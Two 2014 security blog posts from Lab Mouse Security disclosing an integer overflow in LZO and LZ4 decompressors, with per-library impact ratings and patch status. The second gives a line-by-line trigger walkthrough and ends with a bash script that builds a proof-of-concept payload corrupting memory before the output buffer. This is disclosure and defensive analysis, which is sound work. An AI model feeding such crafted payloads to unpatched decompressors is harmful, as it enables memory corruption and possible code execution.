Friday, June 27, 2014

Understanding the LZ4 Memory Corruption Vulnerability

You Don't Play Right

The entire premise behind security auditing is to identify ways that software can be abused. Period. Our concern as analysts is not to evaluate software "within the parameters in which it should be used". The best security bugs are slight abuses of an API outside of the normal use cases. So, when an engineer claims that a flaw isn't a flaw at all because "no one will ever use the API in that fashion", they are misinformed. Unfortunately, by asserting this, they are also misinforming their peers and users. 

A similar issue has arisen here. The claim has been made that LZ4 is not vulnerable because every implementation will only call it with a certain amount of memory. OK, so those use cases aren't vulnerable. I acknowledged this in my original blog post when I stated that ZFS is a perfect example of LZ4 not being vulnerable because it limits its block size to 128k. Regardless, I haven't audited every implementation that uses LZ4, so I cannot assert whether all, some, or none of the use cases are vulnerable. That would be speculation, which is a waste of everyone's time. 

There is a more important point. The point is that the algorithm doesn't care about size. There is no check in the decompression routine to determine whether an input buffer is too large, or even within the bounds of the algorithm's specification. There is no validation routine to ensure that the output buffer doesn't exceed a threshold. This means that anyone can use that code and call it in any way they choose. The caller doesn't have to play by the author's original rules, and the caller may not even know the rules because the algorithm doesn't enforce any. 

In fact, there are certain cases where this is desirable behavior. For instance, anti-virus and anti-spyware programs must be able to parse compressed data in order to evaluate whether a file is suspicious. If known variants of a virus or spyware break a compression format's specification to evade A/V detection, the A/V application must break it as well. This leaves A/V utilities open to vulnerabilities that they never intended to have, simply because they are using an API in an unintended, but valid, fashion. 

This is how a lot of security vulnerabilities arise in projects. Code isn't adequately documented, or API calls aren't adequately guarded to enforce the author's constraints. When these gaps occur in APIs meant for general consumption, failures will absolutely occur. It doesn't matter if all current users of the algorithm adhere to a certain standard. There is no guarantee that users in the future will. 

It's Just Not Big Enough

The claim that 64bit platforms are not exploitable is incorrect. This is the same mindset that created today's LZO/LZ4 vulnerability: "No one will ever have that much RAM to cause a 32bit integer overflow!" Well, today we do. Had this bug persisted and propagated further, 64bit architectures would surely have been affected in the not-so-distant future. 

This kind of attitude has no longevity. If you're building a threat model for today instead of projections of what likely states can occur in the future as well as today, you're not building a safe platform suitable for public consumption. You might as well rewrite the implementation every couple of years to suit the new architectures and platforms that are available. 

If we want to engineer safe, efficient, long-lasting code, it has to be done using foresight and threat models that accurately account for today's and tomorrow's likely environments. Threat models are not built on a snapshot in time, but on a reasonable projection of the life of a project. If there is no value placed in the project's longevity, then it's not a professional, long-lasting project. Why use something that isn't expected to last? 

A Literal Run Around

Now, on to the fun part. The details of the exploit. Before anyone worries, I reached out to the Linux team to make sure that the patches are in a position where I can post this information. They did not protest, largely because only the API itself is vulnerable - there are no vectors from which exploitation can occur at this time. So, let's take a look. Feel free to follow along at the LXR site. For ease of demonstration, presume a 32bit architecture so the exploit below is practical to test. 

To trigger the bug, two things need to happen. First, we need to be able to point to an address outside the bounds of the valid decompression output buffer. Second, we need to be able to write to that address. Let's start with issue number one. 

Pointing North

To successfully set the write pointer variable 'op' outside of the bounds of the valid decompression buffer, there are a few steps that must be taken. Otherwise, we will hit an error condition and be forced to return from the decompression routine with error. 

 64         while (1) {
 66                 /* get runlength */
 67                 token = *ip++;
 68                 length = (token >> ML_BITS);
 69                 if (length == RUN_MASK) {

The code above is the first code we encounter on entry to the lz4_uncompress routine. Line 69 is the check that gates the length-accumulation loop that allows for integer overflow. However, we can't use it. Why? If we trigger the Literal Run length accumulator now, we will error out too early. Instead, we must ignore this instance of the vulnerability and move on. 

 78                 /* copy literals */
 79                 cpy = op + length;
 80                 if (unlikely(cpy > oend - COPYLENGTH)) {
 81                         /*
 82                          * Error: not enough place for another match
 83                          * (min 4) + 5 literals
 84                          */
 85                         if (cpy != oend)
 86                                 goto _output_error;
 88                         memcpy(op, ip, length);
 89                         ip += length;
 90                         break; /* EOF */
 91                 }
 92                 LZ4_WILDCOPY(ip, op, cpy);
 93                 ip -= (op - cpy);
 94                 op = cpy;

Next, we have to bypass the above code without triggering an EOF condition and breaking the loop. To do this, we simply place a small literal copy value as the first input byte. This will ensure the expression at line 80 does not evaluate to True. 

The LZ4_WILDCOPY macro copies the literal bytes from the input pointer 'ip' into the output pointer 'op'. Because the copy works in oversized chunks, 'ip' is then rewound by the number of bytes the copy overshot, leaving it pointed just past the literal data. The output pointer, as expected, now points past the copied bytes to the next available output byte. 

 96                 /* get offset */
 97                 LZ4_READ_LITTLEENDIAN_16(ref, cpy, ip);
 98                 ip += 2;
100                 /* Error: offset create reference outside destination buffer */
101                 if (unlikely(ref < (BYTE *const) dest))
102                         goto _output_error;

This is where things get slightly tricky. The code above, on line 97, retrieves a 16bit little-endian "reference" value from the input buffer. Remember that the input pointer has just been rewound? This means that we need to embed the reference value at the start of the literal copy. 

We also have to bypass the check at line 101. Since 'ref' is a pointer to the output buffer, and we can't really abuse it to corrupt memory, we should just set this to zero to ignore the whole mess. Therefore, we have our first real values in the payload: 0x00, 0x00. These two bytes will give us a 'ref' value offset of 0x0000. 

104                 /* get matchlength */
105                 length = token & ML_MASK;
106                 if (length == ML_MASK) {
107                         for (; *ip == 255; length += 255)
108                                 ip++;
109                         length += *ip++;
110                 }

Next, we hit the code chunk at line 105. The token value is the same value that it was at the beginning of this loop, when we entered the function. This means that the first byte of the input payload must be set to ML_MASK to perform the above (second) Literal Run size accumulator. Since ML_MASK is defined as 0x0f, this becomes our first byte in the payload. Now we know what the first three bytes have to be: 0x0f, 0x00, 0x00. 

Because the input pointer is now at address &input[3], and we are trying to abuse this accumulator loop to build a large value, we need a large number of bytes here equal to 255. On line 107, as long as a byte from the input buffer equals 255, the loop will continue, and 'length' will grow. 

Remember two things. First, the token value must have ML_MASK set. This means that the token variable must equate to 0x0f. This also means that the first Literal Run copies fifteen bytes. Our first two bytes in that copy buffer must be 0x00 0x00 for 'ref'. Thus, thirteen more bytes must be set to 0xff to complete that run. 

In this run, we will generate a sample value of 0xfffffff0. To do so, we need a total of 16,843,008 bytes set to 0xff. We already have thirteen bytes, so we need 16,842,995 more. 

To break out of the for loop, on line 107, we simply finish the run with the value 0xcd, which completes the 'length' variable's accumulation to 0xfffffff0. 

112                 /* copy repeated sequence */
113                 if (unlikely((op - ref) < STEPSIZE)) {

The expression at line 113 evaluates to True. We don't really care about this block of code because we don't have to accommodate for anything that is performed here. 

132                 cpy = op + length - (STEPSIZE - 4);
133                 if (cpy > (oend - COPYLENGTH)) {
135                         /* Error: request to write beyond destination buffer */

This is where things get fun. On line 132, the overflow occurs. Now that we have a sufficiently large value in 'length', we can overflow the pointer 'op'. This will cause 'cpy' to point to an address prior to the start of the output buffer. Since it is before even the beginning of the output buffer, the expression on 133 will never evaluate to True, bypassing this error check.

150                 LZ4_SECURECOPY(ref, op, cpy);
151                 op = cpy; /* correction */
152         }

The LZ4_SECURECOPY is actually a NO-OP here. Why? It validates that 'op' is before 'cpy' before implementing the actual copy operation. As a result, no copy will occur. But, that is OK because we don't want the copy to occur here. Instead, something better happens. The pointer 'op' is set to 'cpy', ensuring that the output pointer now points to a memory address we control. 

Lastly, at line 152, we loop back to the top of the while loop. 

Writing Home

Now that we are back at the start of the while loop, we can write as much data as we like to whichever address in memory we desire. How? We simply specify the size of the write using either the simple length value or the Literal Run accumulator loop. 

 64         while (1) {
 66                 /* get runlength */
 67                 token = *ip++;
 68                 length = (token >> ML_BITS);
 69                 if (length == RUN_MASK) {

Once the length is generated, a copy is executed in the following code that we've already looked at:

 92                 LZ4_WILDCOPY(ip, op, cpy);
 93                 ip -= (op - cpy);
 94                 op = cpy;

That's it! The memory overwrite is complete. We have copied any number of bytes we choose to anywhere in memory we desire. This makes the LZ4 vulnerability far more precise than the LZO one. 

Make It Easy

At the bottom of this post, you'll find a script I've written to auto-generate the test payload above. It will overwrite memory 32 bytes prior to the start of the valid output buffer. This is valid memory corruption and can be tested fairly easily using the patched version of the Linux kernel's lz4_decompress.c from here.


To summarize, security auditing isn't about exploitation. Auditing is about finding critical bugs. Critical bugs don't need an immediate path to exploitation; they just have to have a legitimately critical impact that could affect multiple platforms in the near future. This is true of the LZ4 vulnerability. Library-based vulnerabilities:
  • Are critical if they cause precise memory corruption, regardless of current use cases
  • Are often present, or magnified, in abnormal use cases such as anti-virus applications 
  • Are often vulnerable regardless of underlying architecture
  • Must be evaluated from a context of longevity
  • Cannot be ignored because current use cases aren't vulnerable; libraries can be used any way the application writer chooses
I hope this helps everyone understand my position on the critical nature of the LZ4 vulnerability. No, it currently won't get you ring 0 or UID 0 on Linux. But, by closing this hole today, we know no one ever will. And that's really what this is all about, right? 

Best wishes,
Don A. Bailey
Founder / CEO
Lab Mouse Security

#!/bin/bash
# LZ4 Exploit Payload Generator
# Don A. Bailey 
# Overwrites memory with "donbdonb" 32 bytes prior to the valid start of
# the decompression output buffer.
# June 27th, 2014

# output file name (chosen here for illustration)
FILE=payload.bin

append()
{
	printf "$1" >> $FILE
}

large()
{
	x="\"\\xff\" x $1"
	perl -e "print $x" >> $FILE
}

# initialize the file
rm -f $FILE
touch $FILE

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0
# now we need (16843008 - 13) 0xff bytes 
large 16842995

# complete the sequence
append "\xcd"

# because cpy is lower than op, LZ4_SECURECOPY will fail
# op is now set to the mangled cpy

# create a simple literal run length without a RUN_MASK
# and copy 8 bytes to the corrupted pointer address
append "\x08"

append "donbdonb"

Thursday, June 26, 2014

Raising Lazarus - The 20 Year Old Bug that Went to Mars

Twenty Years Old

Mars Curiosity Rover
It's rare that you come across a bug so subtle that it can last for two decades. But, that's exactly what has happened with the Lempel-Ziv-Oberhumer (LZO) algorithm. Initially written in 1994, Markus Oberhumer designed a sophisticated and extremely efficient compression algorithm, so elegant and well architected that it decompresses four to five times faster than zlib and bzip.

As a result, Markus has made a successful and well deserved career out of optimizing code for various platforms. I was impressed to find out that his LZO algorithm has gone to the planet Mars on NASA devices multiple times! Most recently, LZO has touched down on the red planet within the Mars Curiosity Rover, which just celebrated its first martian anniversary on Tuesday.

Because of the speed and efficiency of the algorithm, LZO has made its way into both proprietary and open source projects world-wide. It has lived in automotive systems, airplanes, and other embedded systems for over a decade. The algorithm has even made its way into projects we use on a daily basis, such as OpenVPN, MPlayer2, Libav, FFmpeg, the Linux kernel, Juniper Junos, and much, much more.

In the past few years, LZO has gained traction in file systems as well. LZO can be used in the Linux kernel within btrfs, squashfs, jffs2, and ubifs. A recent variant of the algorithm, LZ4, is used for compression in ZFS for Solaris, Illumos, and FreeBSD.

LZO is even enabled in kernels for Samsung Android devices to increase kernel loading speed and improve the user experience, as noted in the Android Hacker's Handbook.

With its popularity increasing, Lempel-Ziv-Oberhumer has been rewritten by many engineering firms for both closed and open systems. These rewrites, however, have always been based on Oberhumer's core open source implementation. As a result, they all inherited a subtle integer overflow. Even LZ4 contains the exact same bug, in a very slightly altered form.

Engineered Genetics

Code reuse is a normal part of engineering, and is something we do every day. But, it can be dangerous. By reusing code that is known to work well, especially in highly optimized algorithms, projects can become subject to vulnerabilities in what is perceived as trusted code. Auditing highly optimized algorithms is a fragile endeavor. It is very easy to break these types of algorithms. Therefore, reused code that is highly specialized is often presumed safe because of its age, its proven efficiency, and its fragility.

This creates a sort of digital DNA, a digital genetic footprint that can be traced over time. Though there are certainly many instances of proprietary variants of LZO and LZ4, the following six implementations are available in open source software:

Despite each implementation of the algorithm being noticeably different, each variant is vulnerable in the exact same way. Let's take a look at a version of the algorithm that is easy to read online: the Linux kernel implementation found here.

In all variants of LZ[O4], the vulnerability occurs when processing a Literal Run. This is a chunk of compressed data that isn't compressed at all. Literals are uncompressed bytes that the user decided, for whatever reason, should not be compressed. A Literal Run is signaled by a state machine in LZO, and by a Mask in LZ4.

 56                         if (likely(state == 0)) {
 57                                 if (unlikely(t == 0)) {
 58                                         while (unlikely(*ip == 0)) {
 59                                                 t += 255;
 60                                                 ip++;
 61                                                 NEED_IP(1);
 62                                         }
 63                                         t += 15 + *ip++;
 64                                 }
 65                                 t += 3;

In the above sample, the integer overflow is evident. The variable 't' is incremented by 255 every time the compression payload contains a nil byte (0x00) when a Literal Run is detected. Regardless of whether the variable 't' is signed or unsigned, 255 will be added to it. The only check is to ensure that the input buffer contains another byte. This means that 't' can accumulate until it is a very large unsigned integer. If 't' is a 32bit integer, it only takes approximately sixteen (16) megabytes of zeroes to generate a sufficiently large value for 't'. Though 't' can overflow here, this is not where the attack occurs. There is another more important overflow just below this chunk of code. 

66 copy_literal_run:
68                                 if (likely(HAVE_IP(t + 15) && HAVE_OP(t + 15))) {
69                                         const unsigned char *ie = ip + t;
70                                         unsigned char *oe = op + t;
71                                         do {
72                                                 COPY8(op, ip);
73                                                 op += 8;
74                                                 ip += 8;
75                                                 COPY8(op, ip);
76                                                 op += 8;
77                                                 ip += 8;
78                                         } while (ip < ie);
79                                         ip = ie;
80                                         op = oe;
81                                 } else
82 #endif

Above, we see the "copy_literal_run" chunk of code. This is the section of the LZO algorithm that uses the variable 't' as a size parameter. On line 68, the code ensures that the input buffer (IP) and output buffer (OP) are large enough to contain 't' bytes. However, in the Linux kernel implementation, they pad by 15 bytes to ensure the 16 byte copy does not overflow either buffer. This is where things fail.

The macros HAVE_IP and HAVE_OP validate that 't' bytes are available in the respective buffer. But, before the macro is called, the expression (t + 15) is evaluated. If the value of 't' is large enough, this expression will cause an integer overflow. The attacker can make this expression result in a value of zero (0) through fourteen (14) by forcing 't' to equal the values -15 to -1, respectively. This means that the HAVE macros will always believe that enough space is available in both input and output buffers.

On line 70, the pointer 'oe' will now point before the 'op' buffer, potentially pointing to memory prior to the start of the output buffer. The subsequent code will copy sixteen (16) bytes from the input pointer to the output pointer, which is harmless in itself, as these pointers still point to a "safe" location in memory. However, there are two side effects here that the attacker must abuse: lines 78 and 80.

Because 'ie' will always have an address lower in memory than 'ip', the loop is immediately broken after the first sixteen (16) byte copy. This means that the value 't' did not cause a crash in the copy loop, making this copy essentially a no-op from the attacker's point of view. Most importantly, on line 80 (and 79), the buffer pointer is set to the overflown pointer. This means that now, the output pointer points to memory outside of the bounds of the output buffer. The attacker now has the capability to corrupt memory, or at least cause a Denial of Service (DoS) by writing to an invalid memory page.

The Impact of Raising Dead Code

Each variant of the LZO and LZ4 implementation is vulnerable in slightly different ways. The attacker must construct a malicious payload to fit each particular implementation. One payload cannot be used to trigger more than a DoS on each implementation. Because of the slightly different overflow requirements, state machine subtleties, and overflow checks that must be bypassed, even a worldwide DoS is not a simple task. 

This results in completely different threats depending on the implementation of the algorithm, the underlying architecture, and the memory layout of the target application. Remote Code Execution (RCE) is possible on multiple architectures and platforms, but absolutely not all. Denial of Service is possible on most implementations, but not all. Adjacent Object Over-Write (OOW) is possible on many architectures.

Lazarus raised from the dead
Because the LZO algorithm is considered a library function, each specific implementation must be evaluated for risk, regardless of whether the algorithm used has been patched. Why? We are talking about code that has existed in the wild for two decades. The scope of this algorithm touches everything from embedded microcontrollers on the Mars Rover to mainframe operating systems, modern day desktops, and mobile phones. Engineers that have used LZO must evaluate their use case to identify whether or not the implementation is vulnerable, and in what form.

Here is a list of impact based on each library. Implementations, or use cases of each library may change the threat model enough to warrant reclassification. So, please have a variant audited by a skilled third party, such as <shameless plug>.

  • Oberhumer LZO
    • RCE: Impractical 
    • DoS: Practical
    • OOW: Practical
    • NOTE: 64bit platforms are impractical for all attacks
  • Linux kernel LZO
    • RCE: Impractical
    • DoS: Practical
    • OOW: Practical
    • NOTE: Only i386/PowerPC are impacted at this time
  • Libav LZO
    • RCE: Practical
    • DoS: Practical
    • OOW: Practical
  • FFmpeg LZO
    • RCE: Practical
    • DoS: Practical
    • OOW: Practical
  • Linux kernel LZ4
    • RCE: Practical
    • DoS: Practical
    • OOW: Practical
    • NOTE: 64bit architectures are NOT considered practical
  • LZ4
    • RCE: Practical
    • DoS: Practical
    • OOW: Practical
    • NOTE: 64bit architectures are NOT considered practical
For a bug report on each implementation, please visit the Lab Mouse Security's vulnerability site. 

How Do You Know If You're Vulnerable

Projects Using LZO/LZ4

The easiest way to identify whether your specific implementation is vulnerable is to determine the maximum chunk size that is passed to the decompress routine. If buffers of sixteen (16) megabytes or more can be passed to the LZO or LZ4 decompress routine in one call, then exploitation of the integer overflow is possible. For example, ZFS constrains buffer sizes to 128k. So, even though they use a vulnerable implementation of LZ4, an attack is not possible without a second bug to bypass the buffer size constraint. 

The second easiest way is to identify the bit size of the count variable. If the count variable (for example, named 't' in the Linux kernel code shown above) is 64bit, it would take such a massive amount of data to trigger the overflow that the attack would likely be infeasible, regardless of how much data can be passed to the vulnerable function in one call. This is due to the fact that even modern computers do not have enough RAM available to store the data required to implement such an attack. 

However, there is a caveat to the previous check. Verify that, even if the count variable is 64bit in size, the value is still 64bit at the point where the length is actually checked. If the length value is truncated to 32bits anywhere along the way, the attack will still work with only sixteen (16) megabytes of data. 


All users of FFmpeg, Libav, and projects that depend on them, should consider themselves at risk of remote code execution. Period. Please update your software from the FFmpeg and Libav websites, or refrain from using these applications until your distribution has an adequate patch. 

It should be noted that certain Linux distributions package Mplayer2 with the base system by default. MPlayer2 is vulnerable to RCE "out of the box". If your distribution packages MPlayer2 by default, be sure to disable the embedded media player plugin (gecko-mediaplayer) for your browser. Firefox/Iceweasel, Chromium, Opera, Konqueror, and other Linux-based browsers are vulnerable to RCE regardless of the platform/architecture when an MPlayer2 plugin is enabled. 

Vendor Status

Lab Mouse has reached out to and worked with each vendor of the vulnerable algorithm. As of today, June 26th, 2014, all LZO vendors have patches either available online, or will later today. Please update as soon as possible to minimize the existing threat surface.

In the near future, Lab Mouse will publish a more technical blog on why and how RCE is possible using this bug. We consider that information to be imperative for both auditors and engineers, as it assists in identifying, classifying, and prioritizing a threat. However, that report will be released once the patches have been widely distributed for a sufficient amount of time.

For more information, please visit our contact page. We are more than happy to help your team with their use case, or implementation of these algorithms.


Overall, this is how this bug release breaks down.

  • Vendors have patches ready or released
  • Distributions have been notified 
  • Vendors of proprietary variants have been notified (where they could be found)
  • All bug reports can be found here
  • RCE is not only possible but practical on all Libav/FFmpeg based projects
  • All others are likely impractical to RCE, but still possible given a sufficiently skilled attacker

It is always exciting to uncover a vulnerability as subtle as this issue, especially one that has persisted and propagated for two decades. But, it makes me pause and consider the way we look at engineering as a model.

Speed and efficiency are imperatives for modern projects. We're building technology that touches our lives like never before. I know that most engineers strive to build not only elegant, but safe code. But, we still see security as a disparate discipline from engineering. Security and engineering could not be more tightly bound. Without engineering, you can't provide security to users. Without security, engineering cannot provide a stable and provable platform.

Neil deGrasse Tyson famously spoke of the "God of the gaps". There is a similar issue in engineering. The individual often sees stability where the individual doesn't have expertise. Our god is the algorithm. We "bless" certain pieces of code because we don't have the time or knowledge to evaluate them. When we, as engineers and analysts, take that perspective, we are doing a disservice to the people that use our projects and services.

Often the best eyes are fresh or untrained eyes. The more we stop telling ourselves to step over the gaps in our code bases, the more holes we'll be able to fill. All it takes is one set of eyes to find a vulnerability; there is no level of expertise required to look and ask questions. Just look. Maybe you'll find the next 20 year old vulnerability.


I'd like to thank the following people for their great assistance patching, coordinating, and advising on this issue:

  • Greg Kroah-Hartman (Linux)
  • Linus Torvalds (Linux)
  • Kees Cook (Google)
  • Xin LI (FreeBSD)
  • Michael Niedermayer (FFmpeg)
  • Luca Barbato (Libav/Gentoo)
  • Markus Oberhumer
  • Christopher J. Dorros (NASA MSL)
  • Dan McDonald (Omniti)
  • Yves-Alexis Perez (Debian)
  • Kurt Seifried (Red Hat)
  • Willy Tarreau (Linux)
  • Solar Designer (Openwall)
  • The US-CERT team
  • The Oracle security team
  • The GE security team
  • Kelly Jackson Higgins (UBM)
  • Steve Ragan (IDG Enterprise)
  • Elinor Mills

Feeling Guilty?

Are you reading this post, thinking about all the administrators and engineers that are going to have to patch the LZO/LZ4 issue in your team's systems? Take some time to tell them how you feel with our hand crafted Lab Mouse Security custom Sympathy Card!

Hand crafted with the finest bits and bytes, our Sympathy Card shows your engineer what they mean to you and your team. This is a limited run of cards, and will proudly display the Linux kernel LZO exploit written by Lab Mouse on the card.

Best wishes,
Don A. Bailey
Founder / CEO
Lab Mouse Security
June 26th, 2014